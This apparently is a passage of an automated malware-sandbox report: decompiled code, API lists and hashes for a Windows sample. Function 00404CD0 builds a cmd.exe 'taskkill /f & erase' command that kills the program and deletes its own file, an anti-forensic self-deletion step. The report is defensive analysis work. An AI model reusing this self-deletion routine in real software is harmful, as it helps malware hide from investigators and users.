											_t384 = _t384 + 8;
											goto L31;
										} else {
											_t314 =  *(_t314 - 4);
											_t353 = _t365 + 0x23;
											__eflags = _t283 - _t314 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L71;
											} else {
												goto L30;
											}
										}
									}
								} else {
									asm("movups xmm0, [ebp-0x1cc]");
									 *_t281 = 0;
									asm("movups [eax], xmm0");
									asm("movq xmm0, [ebp-0x1bc]");
									asm("movq [eax+0x10], xmm0");
									_v48 = _v48 + 0x18;
									goto L31;
								}
							}
						}
					} else {
						if(_t371 < 0x1000) {
							_t297 = E0040D5BF(_t366, _t371, __eflags, _t371);
							_t398 = _t384 + 4;
							_t366 = _t297;
							L9:
							E0040ECB0(_t366, _v40, _t371);
							_t314 = _t371 + _t366;
							_v196 = _t314;
							_t384 = _t398 + 0xc;
							 *_v240 = _t366;
							 *_v224 = _t366;
							 *_v208 = _t371;
							_t197 = 3;
							goto L11;
						} else {
							_t41 = _t371 + 0x23; // 0x23
							_t302 = _t41;
							_t405 = _t302 - _t371;
							if(_t302 <= _t371) {
								L68:
								E004011A0(); // executed
								L69:
								E00404CD0(_t305, __eflags); // executed
								L70:
								_t201 = E00407F90( &_v444, _t314);
								_t385 = _t384 - 0xc;
								L72();
								E00409DB0( &_v444, E00401E90( &_v520, E0040A070(_t201)));
								_t314 =  &_v520;
								E00401DC0(_t305,  &_v520);
								E0041647D(0);
								goto L71;
							} else {
								_t303 = E0040D5BF(_t366, _t371, _t405, _t302);
								_t385 = _t384 + 4;
								if(_t303 == 0) {
									L71:
									E00411D17(_t305, _t314, _t353, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t375);
									_t376 = _t385;
									_t208 =  *0x43b054; // 0x41d6575c
									_v560 = _t208 ^ _t376;
									_push(_t305);
									_v568 = 0x5a5d4b5a;
									_t319 =  *( *[fs:0x2c]);
									_t211 =  *0x43cf48; // 0x0
									__eflags = _t211 -  *((intOrPtr*)(_t319 + 4));
									if(_t211 >  *((intOrPtr*)(_t319 + 4))) {
										E0040D738(_t211, 0x43cf48);
										__eflags =  *0x43cf48 - 0xffffffff;
										if(__eflags == 0) {
											_t178 =  &_v28; // 0x5a5d4b5a
											 *0x43ce24 =  *_t178;
											 *0x43ce28 = 0x2e;
											E0040DA4A(_t319, __eflags, 0x42b870);
											E0040D6EE(0x43cf48);
										}
									}
									__eflags = _v20 ^ _t376;
									_pop(_t307);
									return E0040D3AF(0x43ce24, _t307, _v20 ^ _t376, _t353, _t366, _t371);
								} else {
									_t42 = _t303 + 0x23; // 0x23
									_t366 = _t42 & 0xffffffe0;
									 *((intOrPtr*)(_t366 - 4)) = _t303;
									goto L9;
								}
							}
						}
					}
				}
			}

0x00407fb0
0x00407fb1
0x00407fb9
0x00407fc0
0x00407fc4
0x00407fc6
0x00407fc8
0x00407fd3
0x00407fd4
0x00407fd5
0x00407fdb
0x00407fe0
0x00407fe2
0x00407fe5
0x00407fe6
0x00407fe7
0x00407feb
0x00407ff1
0x00407ff4
0x00407ff6
0x00407ffd
0x00408004
0x0040800b
0x00408012
0x00408015
0x00408015
0x00408017
0x00408018
0x00408018
0x0040801e
0x00408023
0x00408033
0x0040803d
0x00408044
0x0040804b
0x00408050
0x00408053
0x00408063
0x0040806d
0x00408070
0x0040807d
0x00408085
0x0040808c
0x00408096
0x004080a0
0x004080a8
0x004080b3
0x004080b6
0x004080c7
0x004080ca
0x004080cd
0x004080d4
0x004080da
0x004080e6
0x004080e9
0x004080ed
0x004080f0
0x004080f5
0x00408105
0x004086f9
0x00000000
0x0040810b
0x0040810d
0x0040817e
0x00408188
0x00408188
0x00408189
0x0040818c
0x00408198
0x0040819f
0x004081a6
0x004081ad
0x004081b2
0x004081bf
0x004081c1
0x004081c1
0x004081c7
0x004081cb
0x004081da
0x004081db
0x004081de
0x004081cd
0x004081cd
0x004081cf
0x004081d4
0x004081d4
0x004081e3
0x004081e4
0x004081ed
0x004081f2
0x004081fa
0x004081c1
0x00408209
0x0040820e
0x00408216
0x00408218
0x00000000
0x0040821e
0x0040821e
0x00408228
0x00408374
0x00408374
0x00408376
0x0040837b
0x00408388
0x0040838f
0x00408394
0x00408397
0x0040839e
0x004083a8
0x004083ad
0x004083ba
0x004083bf
0x004083bf
0x0040839e
0x004083c2
0x004083c9
0x004083cb
0x004083d2
0x004083d9
0x004083e2
0x004083e2
0x004083e7
0x004083ec
0x004083f6
0x00408400
0x0040840a
0x0040840a
0x00408410
0x00408410
0x00408412
0x00408413
0x00408419
0x00408425
0x0040842a
0x00408433
0x00408435
0x00408443
0x0040853d
0x0040853d
0x00408541
0x00408548
0x00000000
0x00000000
0x00000000
0x00000000
0x00408449
0x00408449
0x0040844e
0x00408455
0x00408462
0x00408469
0x0040846e
0x00408471
0x00408478
0x0040847d
0x0040848d
0x00408492
0x0040849f
0x004084a4
0x004084a4
0x00408478
0x004084a7
0x004084ae
0x004084b0
0x004084b7
0x004084be
0x004084c5
0x004084ce
0x004084ce
0x004084d3
0x004084d8
0x004084e2
0x004084ec
0x004084f6
0x004084f6
0x00408500
0x00408500
0x00408502
0x00408503
0x00408509
0x00408515
0x0040851a
0x00408523
0x00408525
0x0040852c
0x00408533
0x00000000
0x00408535
0x00408535
0x0040854a
0x0040854a
0x00408553
0x00408587
0x00408587
0x00408590
0x004085c4
0x004085cb
0x00000000
0x004085d1
0x004085d1
0x004085d4
0x004085da
0x004085df
0x004085e5
0x004085ea
0x004085ef
0x004085f2
0x004085f8
0x00408626
0x0040862c
0x0040862f
0x00408640
0x00408643
0x00408646
0x00408653
0x0040865e
0x00408661
0x00408672
0x00408675
0x00408678
0x00408685
0x0040868d
0x00408697
0x0040869c
0x004086a2
0x004086a7
0x004086ad
0x004086d9
0x004086dc
0x004086e4
0x004086e5
0x004086f6
0x004086af
0x004086af
0x004086b2
0x004086b2
0x004086b5
0x004086bd
0x004086cf
0x004086cf
0x004086d1
0x00000000
0x004086bf
0x004086bf
0x004086c2
0x004086cd
0x00000000
0x00000000
0x00000000
0x00000000
0x004086cd
0x004086bd
0x004085fa
0x004085fa
0x004085fd
0x004085fe
0x00408606
0x0040861c
0x0040861c
0x0040861e
0x00408623
0x00000000
0x00408608
0x00408608
0x0040860b
0x00408616
0x00000000
0x00000000
0x00000000
0x00000000
0x00408616
0x00408606
0x004085f8
0x00408592
0x00408592
0x00408598
0x00408599
0x004085a1
0x004085b7
0x004085b7
0x004085b9
0x004085be
0x004085c1
0x00000000
0x004085a3
0x004085a3
0x004085a6
0x004085b1
0x00000000
0x00000000
0x00000000
0x00000000
0x004085b1
0x004085a1
0x00408555
0x00408555
0x0040855b
0x0040855c
0x00408564
0x0040857a
0x0040857a
0x0040857c
0x00408581
0x00408584
0x00000000
0x00408566
0x00408566
0x00408569
0x00408574
0x00000000
0x00000000
0x00000000
0x00000000
0x00408574
0x00408564
0x00408553
0x00408533
0x0040822e
0x0040822e
0x00408230
0x00408235
0x0040823c
0x00408248
0x0040824f
0x00408254
0x00408257
0x0040825e
0x00408263
0x00408271
0x00408277
0x00408284
0x00408289
0x00408289
0x0040825e
0x0040828c
0x00408293
0x00408295
0x0040829c
0x004082a3
0x004082aa
0x004082b1
0x004082ba
0x004082ba
0x004082bf
0x004082c4
0x004082ce
0x004082d8
0x004082e2
0x004082e2
0x004082e5
0x004082e5
0x004082e7
0x004082e8
0x004082ee
0x004082f4
0x004082fa
0x004082ff
0x00408305
0x00408330
0x00408331
0x00408332
0x00408335
0x0040833a
0x00408340
0x00408343
0x00000000
0x00408345
0x00408345
0x0040834b
0x0040834c
0x0040834e
0x00408354
0x0040836a
0x0040836a
0x0040836c
0x00408371
0x00000000
0x00408356
0x00408356
0x00408359
0x00408361
0x00408364
0x00000000
0x00000000
0x00000000
0x00000000
0x00408364
0x00408354
0x00408307
0x00408307
0x0040830e
0x00408314
0x00408317
0x0040831f
0x00408324
0x00000000
0x00408324
0x00408305
0x00408228
0x0040810f
0x00408115
0x0040813f
0x00408144
0x00408147
0x00408149
0x0040814e
0x00408159
0x0040815c
0x00408162
0x00408165
0x0040816d
0x00408175
0x00408177
0x00000000
0x00408117
0x00408117
0x00408117
0x0040811a
0x0040811c
0x004086fe
0x004086fe
0x00408703
0x00408703
0x00408708
0x0040870f
0x00408714
0x00408717
0x00408736
0x0040873b
0x00408741
0x00408748
0x00000000
0x00408122
0x00408123
0x00408128
0x0040812d
0x0040874d
0x0040874d
0x00408752
0x00408753
0x00408754
0x00408755
0x00408756
0x00408757
0x00408758
0x00408759
0x0040875a
0x0040875b
0x0040875c
0x0040875d
0x0040875e
0x0040875f
0x00408760
0x00408761
0x00408766
0x0040876d
0x00408776
0x00408777
0x00408780
0x00408782
0x00408787
0x0040878d
0x00408794
0x0040879c
0x004087a3
0x004087a5
0x004087ad
0x004087b2
0x004087b8
0x004087c2
0x004087c7
0x004087a3
0x004087d2
0x004087d4
0x004087dd
0x00408133
0x00408133
0x00408136
0x00408139
0x00000000
0x00408139
0x0040812d
0x0040811c
0x00408115
0x0040810d

APIs

__Init_thread_footer.LIBCMT ref: 00408284
__Init_thread_footer.LIBCMT ref: 004083BA
__Init_thread_footer.LIBCMT ref: 0040849F
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00408697
Concurrency::cancel_current_task.LIBCPMT ref: 004086F9
Concurrency::cancel_current_task.LIBCPMT ref: 004086FE

Part of subcall function 004011A0: ___std_exception_copy.LIBVCRUNTIME ref: 004011DE

Part of subcall function 00404CD0: GetCurrentProcessId.KERNEL32(41D6575C), ref: 00404CFC
Part of subcall function 00404CD0: GetCurrentProcessId.KERNEL32 ref: 00404D18
Part of subcall function 00404CD0: ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 00404DB9

__Init_thread_footer.LIBCMT ref: 004087C2

Strings

MFE., xrefs: 0040837B
ZK]Z, xrefs: 004087A5

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCurrentProcess$ExecuteIos_base_dtorShell___std_exception_copystd::ios_base::_
String ID: MFE.$ZK]Z
API String ID: 2568298086-1697028828
Opcode ID: 6732a3074a49e195a9b26473574b1b45a7a4747acc5236a806daecce008d900f
Instruction ID: 540e24b621e48ec69f92b7e802af7bb3b94f3af1d02b36ed25d17d8a1cf6381d
Opcode Fuzzy Hash: 6732a3074a49e195a9b26473574b1b45a7a4747acc5236a806daecce008d900f
Instruction Fuzzy Hash: B32204719002488BDB14DF64DD85BEEBBB1AF49308F1041BEE4447B2D2DB795A84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041637F Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041637F(int _a4) {
				void* _t14;

				if(E0041EBEF(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E004163C1(_t14, _a4);
				ExitProcess(_a4);
			}

0x0041638c
0x004163a8
0x004163a8
0x004163b1
0x004163ba

APIs

GetCurrentProcess.KERNEL32(?,?,0041637E,00000000,761B5970,?,00000000,?,0041B5E3), ref: 004163A1
TerminateProcess.KERNEL32(00000000,?,0041637E,00000000,761B5970,?,00000000,?,0041B5E3), ref: 004163A8
ExitProcess.KERNEL32 ref: 004163BA

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 55a1ffa9ac8918d10742ae41920f232cdb793064bf27e88115d4d494d02cc488
Instruction ID: 13cc8c70d4c1ad6ed732ec4b4b1809a25a55d290dcd9342983aa3c99ed6f6b65
Opcode Fuzzy Hash: 55a1ffa9ac8918d10742ae41920f232cdb793064bf27e88115d4d494d02cc488
Instruction Fuzzy Hash: F1E04F31100108AFCF216B15DD4A99D3F29EB40345F410026F80586132CB39DCE2EA98

Uniqueness

Uniqueness Score: -1.00%

Function 0082092B Relevance: 3.8, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

GetProcAddress., xrefs: 008209DC, 008209DF, 008209E4
l, xrefs: 00820966
., xrefs: 0082095F

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 5f75f963e95139827a35f269e4414f4881f51f411eca48d5853e090c0b4c1383
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 063149B6901619DFDB10CF99D880AAEBBF5FF48324F24414AD441E7212D771EA85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D650 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040D650(_Unknown_base(*)()* __edi, void* __esi) {
				struct HINSTANCE__* _t2;
				void* _t4;
				void* _t7;
				void* _t10;
				struct HINSTANCE__* _t14;

				_t11 = __edi;
				_push(__edi);
				InitializeCriticalSectionAndSpinCount(0x43c4fc, 0xfa0);
				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_t14 = _t2;
				if(_t14 != 0) {
					L2:
					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
					if(_t11 == 0 || _t4 == 0) {
						_t4 = CreateEventW(0, 1, 0, 0);
						 *0x43c4f8 = _t4;
						if(_t4 != 0) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						 *0x43c514 = _t11;
						 *0x43c518 = _t4;
						L5:
						return _t4;
					}
				} else {
					_t14 = GetModuleHandleW(L"kernel32.dll");
					if(_t14 == 0) {
						L7:
						E0040DDE5(_t10, _t11, _t14, 7);
						asm("int3");
						DeleteCriticalSection(0x43c4fc);
						_t7 =  *0x43c4f8; // 0x0
						if(_t7 != 0) {
							return CloseHandle(_t7);
						}
						return _t7;
					} else {
						goto L2;
					}
				}
			}

0x0040d650
0x0040d651
0x0040d65c
0x0040d667
0x0040d66d
0x0040d671
0x0040d684
0x0040d696
0x0040d698
0x0040d6a0
0x0040d6bb
0x0040d6c1
0x0040d6c8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d6a6
0x0040d6a6
0x0040d6ac
0x0040d6b1
0x0040d6b3
0x0040d6b3
0x0040d673
0x0040d67e
0x0040d682
0x0040d6ca
0x0040d6cc
0x0040d6d1
0x0040d6d7
0x0040d6dd
0x0040d6e4
0x00000000
0x0040d6e7
0x0040d6ed
0x00000000
0x00000000
0x00000000
0x0040d682

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0043C4FC,00000FA0,?,?,0040D62E), ref: 0040D65C
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,0040D62E), ref: 0040D667
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040D62E), ref: 0040D678
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040D68A
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040D698
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040D62E), ref: 0040D6BB
DeleteCriticalSection.KERNEL32(0043C4FC,00000007,?,?,0040D62E), ref: 0040D6D7
CloseHandle.KERNEL32(00000000,?,?,0040D62E), ref: 0040D6E7

Strings

SleepConditionVariableCS, xrefs: 0040D684
WakeAllConditionVariable, xrefs: 0040D690
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040D662
kernel32.dll, xrefs: 0040D673

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 35983cdb3e61cc380b173e4f72476b383ffd682be7a6ec163aa8f2d26186bbb9
Instruction ID: b91269b7956a1fb46ce408a8cef814624268e1dac48d328a7a746c3db7dbeaf8
Opcode Fuzzy Hash: 35983cdb3e61cc380b173e4f72476b383ffd682be7a6ec163aa8f2d26186bbb9
Instruction Fuzzy Hash: 3D017171F40221ABDB301BA5BC8EB3F36989F55B917550832F805F2391DA7C98558AAC

Uniqueness

Uniqueness Score: -1.00%

Function 0082003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0082024D

Strings

cess, xrefs: 0082018D
kernel32.dll, xrefs: 0082008F, 00820095

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: cac41cd1332ffd6b31770b7a52752f46f53d39058c172775ffb5c1eeb6370084
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 45526974A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00404CD0(void* __ebx, void* __eflags) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				void* _v164;
				char _v172;
				void** _v180;
				void* _v184;
				void** _v188;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				void* _t50;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t66;
				signed int _t71;
				void* _t75;
				signed int _t78;
				char _t79;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t108;
				signed int _t110;
				void* _t112;
				signed int _t114;

				_t46 =  *0x43b054; // 0x41d6575c
				_v20 = _t46 ^ _t110;
				 *[fs:0x0] =  &_v16;
				_t50 = E00404C30(__ebx,  &_v164, GetCurrentProcessId()); // executed
				_t104 = _t50;
				_v8 = 0;
				_t52 = E00404B30(__ebx,  &_v140, GetCurrentProcessId()); // executed
				_v8 = 1;
				_t53 = E0040B010( &_v116, "/c taskkill /im \"", _t52);
				_v8 = 2;
				_t54 = E0040B080( &_v92, _t53, "\" /f & erase \"");
				_v8 = 3;
				_t99 = E0040B240( &_v68, _t54, _t104);
				_v8 = 4;
				E0040B080( &_v44, _t99, "\" & exit");
				_t114 = _t112 - 0x94 + 0x10;
				E00401DC0(__ebx,  &_v68, _t46 ^ _t110);
				E00401DC0(__ebx,  &_v92, _t103);
				E00401DC0(__ebx,  &_v116,  *[fs:0x0]);
				E00401DC0(__ebx,  &_v140, 0x42ade3);
				E00401DC0(__ebx,  &_v164, 0xffffffff);
				_t91 =  &_v44;
				ShellExecuteA(0, 0, "C:\\Windows\\System32\\cmd.exe", E00401D80(_t91), 0, 0); // executed
				E0041647D(0); // executed
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t110);
				_push(0xffffffff);
				_push(0x42ae2e);
				_push( *[fs:0x0]);
				_push(__ebx);
				_push(_t104);
				_t66 =  *0x43b054; // 0x41d6575c
				_push(_t66 ^ _t114);
				 *[fs:0x0] =  &_v172;
				_t105 = _t99;
				_t108 = _t91;
				_v180 = _t108;
				_v188 = _t108;
				_v184 = 0;
				 *_t108 = 0;
				_t108[4] = 0;
				_t108[5] = 0xf;
				 *_t108 = 0;
				_v164 = 0;
				_v184 = 1;
				E0040A2D0(__ebx, _t91, _t105, _t108, _t105);
				_t117 = _t105;
				if(_t105 > 0) {
					_t78 = 0x3e;
					do {
						_t71 = E004165C6(_t91, _t117);
						_t91 = _t108[4];
						_t33 =  &(("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")[_t71 % _t78]); // 0x33323130
						_t79 =  *_t33;
						_t102 = _t108[5];
						_v24 = _t79;
						if(_t91 >= _t102) {
							_push(_v24);
							_v28 = 0;
							_t91 = _t108;
							E0040BA30(_t79, _t108, _t105, _t108, _t108, _v28);
						} else {
							_t36 =  &(_t91[0]); // 0x1
							_t108[4] = _t36;
							_t75 = _t108;
							if(_t102 >= 0x10) {
								_t75 =  *_t108;
							}
							 *((char*)(_t75 + _t91)) = _t79;
							 *((char*)(_t75 +  &(_t91[0]))) = 0;
						}
						_t78 = 0x3e;
						_t105 = _t105 - 1;
					} while (_t105 != 0);
				}
				 *[fs:0x0] = _v20;
				return _t108;
			}

0x00404ce7
0x00404cee
0x00404cf6
0x00404d0a
0x00404d0f
0x00404d11
0x00404d26
0x00404d31
0x00404d38
0x00404d44
0x00404d4b
0x00404d53
0x00404d64
0x00404d66
0x00404d6d
0x00404d72
0x00404d78
0x00404d80
0x00404d88
0x00404d93
0x00404d9e
0x00404da7
0x00404db9
0x00404dc1
0x00404dc6
0x00404dc7
0x00404dc8
0x00404dc9
0x00404dca
0x00404dcb
0x00404dcc
0x00404dcd
0x00404dce
0x00404dcf
0x00404dd0
0x00404dd3
0x00404dd5
0x00404de0
0x00404de4
0x00404de6
0x00404de7
0x00404dee
0x00404df2
0x00404df8
0x00404dfa
0x00404dfc
0x00404dff
0x00404e02
0x00404e09
0x00404e0f
0x00404e16
0x00404e1d
0x00404e20
0x00404e28
0x00404e2f
0x00404e34
0x00404e36
0x00404e38
0x00404e40
0x00404e40
0x00404e47
0x00404e4c
0x00404e4c
0x00404e52
0x00404e55
0x00404e5a
0x00404e75
0x00404e78
0x00404e80
0x00404e82
0x00404e5c
0x00404e5c
0x00404e5f
0x00404e62
0x00404e67
0x00404e69
0x00404e69
0x00404e6b
0x00404e6e
0x00404e6e
0x00404e87
0x00404e8c
0x00404e8c
0x00404e40
0x00404e96
0x00404ea4

APIs

GetCurrentProcessId.KERNEL32(41D6575C), ref: 00404CFC

Part of subcall function 00404C30: OpenProcess.KERNEL32(00000410,00000000), ref: 00404C5B
Part of subcall function 00404C30: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00404C76
Part of subcall function 00404C30: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404C7D

GetCurrentProcessId.KERNEL32 ref: 00404D18

Part of subcall function 00404B30: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00404B90
Part of subcall function 00404B30: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 00404BAD
Part of subcall function 00404B30: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 00404BCA
Part of subcall function 00404B30: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?), ref: 00404BD1

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 00404DB9

Strings

/c taskkill /im ", xrefs: 00404D2C
" /f & erase ", xrefs: 00404D3D
" & exit, xrefs: 00404D5F
C:\Windows\System32\cmd.exe, xrefs: 00404DB0

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Process$ChangeCloseCurrentFindModuleNameNotificationOpen$BaseEnumExecuteFileModulesShell
String ID: " & exit$" /f & erase "$/c taskkill /im "$C:\Windows\System32\cmd.exe
API String ID: 3061982424-793869484
Opcode ID: a4f0c6a810a418c4990140bfd7cba20f646f349032eef6c8cd59db318adc44f6
Instruction ID: 382d7d8410ee142a6c7f1e21984ec74485ca4cefc3c7a9f8ea7e8dc54b022537
Opcode Fuzzy Hash: a4f0c6a810a418c4990140bfd7cba20f646f349032eef6c8cd59db318adc44f6
Instruction Fuzzy Hash: BE217830A14288EAC710EBA5CC46BDEB7B4AF14704F90417AB145B31E2EF786A09CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404B30 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00404B30(void* __ebx, int* __ecx, long __edx) {
				signed int _v8;
				char _v258;
				short _v260;
				char _v268;
				char _v272;
				char _v276;
				void* __edi;
				void* __esi;
				signed int _t16;
				short _t18;
				intOrPtr _t23;
				char* _t29;
				void* _t31;
				intOrPtr* _t33;
				void* _t39;
				int* _t40;
				long _t41;
				void* _t42;
				signed int _t43;

				_t31 = __ebx;
				_t16 =  *0x43b054; // 0x41d6575c
				_v8 = _t16 ^ _t43;
				_t40 = __ecx;
				_t41 = __edx;
				_v276 = __ecx;
				_v276 = __ecx;
				_t18 =  *0x437a6c; // 0x3e
				asm("movq xmm0, [0x437a64]");
				_v260 = _t18;
				asm("movq [ebp-0x108], xmm0");
				E0040F2F0(__ecx,  &_v258, 0, 0xfa);
				_t42 = OpenProcess(0x410, 0, _t41);
				if(_t42 != 0) {
					_t29 =  &_v276;
					__imp__K32EnumProcessModules(_t42, _t29, 4,  &_v272); // executed
					if(_t29 != 0) {
						__imp__K32GetModuleBaseNameA(_t42, _v276,  &_v268, 0x104); // executed
					}
				}
				FindCloseChangeNotification(_t42); // executed
				_t33 =  &_v268;
				 *_t40 = 0;
				_t40[4] = 0;
				_t39 = _t33 + 1;
				_t40[5] = 0xf;
				 *_t40 = 0;
				do {
					_t23 =  *_t33;
					_t33 = _t33 + 1;
				} while (_t23 != 0);
				E00402030(_t40,  &_v268);
				return E0040D3AF(_t40, _t31, _v8 ^ _t43, _t39, _t40, _t42, _t33 - _t39);
			}

0x00404b30
0x00404b39
0x00404b40
0x00404b45
0x00404b47
0x00404b49
0x00404b4f
0x00404b55
0x00404b5b
0x00404b68
0x00404b78
0x00404b80
0x00404b96
0x00404b9a
0x00404ba5
0x00404bad
0x00404bb5
0x00404bca
0x00404bca
0x00404bb5
0x00404bd1
0x00404bd7
0x00404bdd
0x00404be3
0x00404bea
0x00404bed
0x00404bf4
0x00404bf7
0x00404bf7
0x00404bf9
0x00404bfa
0x00404c0a
0x00404c20

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00404B90
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 00404BAD
K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 00404BCA
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?), ref: 00404BD1

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Process$BaseChangeCloseEnumFindModuleModulesNameNotificationOpen
String ID:
API String ID: 1316604328-0
Opcode ID: 017d9b97119a08e1fcc65e7a079f3965cbf904742a141816d86715bcc600ed0c
Instruction ID: 511a3ad5c3828abb26eca72a3f98e7d75f68978f205cd801aa148102f11956e9
Opcode Fuzzy Hash: 017d9b97119a08e1fcc65e7a079f3965cbf904742a141816d86715bcc600ed0c
Instruction Fuzzy Hash: 8021F875A002199BDB25EF64DC41BEEB7B8FF45300F0002FAE644A7280DBB55B85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404C30 Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00404C30(void* __ebx, int* __ecx, long __edx) {
				signed int _v8;
				char _v268;
				int* _v272;
				void* __edi;
				void* __esi;
				signed int _t11;
				intOrPtr _t14;
				void* _t21;
				intOrPtr* _t23;
				void* _t29;
				void* _t30;
				int* _t31;
				signed int _t32;

				_t21 = __ebx;
				_t11 =  *0x43b054; // 0x41d6575c
				_v8 = _t11 ^ _t32;
